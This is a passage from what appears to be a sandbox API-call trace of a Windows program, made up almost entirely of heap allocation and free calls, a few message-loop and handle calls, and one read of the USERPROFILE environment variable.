lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.745] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.745] FreeLibrary (hLibModule=0x74d40000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.745] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.745] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.746] CloseHandle (hObject=0x268) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0198.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0198.748] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0198.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0198.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.749] CloseHandle (hObject=0x294) returned 1 [0198.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0198.753] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.758] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0198.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0198.759] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.759] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0198.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 